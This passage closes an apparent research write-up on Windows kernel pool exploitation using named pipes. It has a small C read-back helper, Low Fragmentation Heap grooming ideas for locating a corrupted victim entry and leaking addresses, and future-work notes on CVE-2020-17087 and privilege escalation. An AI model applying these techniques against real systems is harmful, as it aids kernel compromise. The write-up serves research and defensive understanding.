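// reading that entry from the other end returns the overflow data that now fills it.
DWORD read_back_overflow(HANDLE read_end, void *out, DWORD entry_size)
{
    DWORD got = 0;
    ReadFile(read_end, out, entry_size, &got, NULL);
    return got;
}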

Potential use-cases:

  1. Leak potentially valuable information (e.g. interesting addresses)
  2. If we control the overflow data, then that could be used potentially to determine some information about the LFH state (or not)
  3. Let's say we are targeting the Low Fragmentation Heap (LFH) and we have the previously described problem of identifying corrupted pipes. We know that a subsegment can hold x objects of a target size and we also assume that subsegments are allocated sequentially. So we allocate 2*x unbuffered entries and 1 buffered. We repeatedly induce the overflow (a prerequisite is a reliable way of triggering the vulnerability) until the overflow hits one of the buffered entries. We then go through our pipes in allocation order, read their contents and find the last overflown unbuffered entry (overflown_unbuffered_entry_index). The buffered entry allocated within the range overflown_unbuffered_entry_index-x to overflown_unbuffered_entry_index+x should be the victim_entry
  4. Maybe some other, more practical use cases :)

Future work

  1. Find a way to identify corrupted pipes in PIPE_TYPE_BYTE mode (should be a difficult task) or try to have Microsoft fix this important bug! (probably an even more difficult task). This would allow us to fill in the final cell of the table, for the category "No Data Control && No Size Control". It is also noted that the in-the-wild exploit for CVE-2020-17087 appears to use named pipes to establish the read/write primitives. This could mean one of the following:

    a. There is a solution to the corrupted pipe identification.

    b. There is a different set of techniques, with more capabilities than those described here

    c. The exploit might have used some other 0days to bind everything together

  2. It would be interesting to escalate privileges through the SECURITY_CLIENT_CONTEXT approach. (Challenging, but it should be feasible.)

References

  1. https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes
  2. Alex Ionescu. "Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool". https://www.alex-ionescu.com/?p=231
  3. Corentin Bayet and Paul Fariello. "Scoop the Windows 10 pool!". https://github.com/synacktiv/Windows-kernel-SegmentHeap-Aligned-Chunk-Confusion
  4. @scwuaptx. https://github.com/scwuaptx/CTF/tree/master/2020-writeup/hitcon/lucifer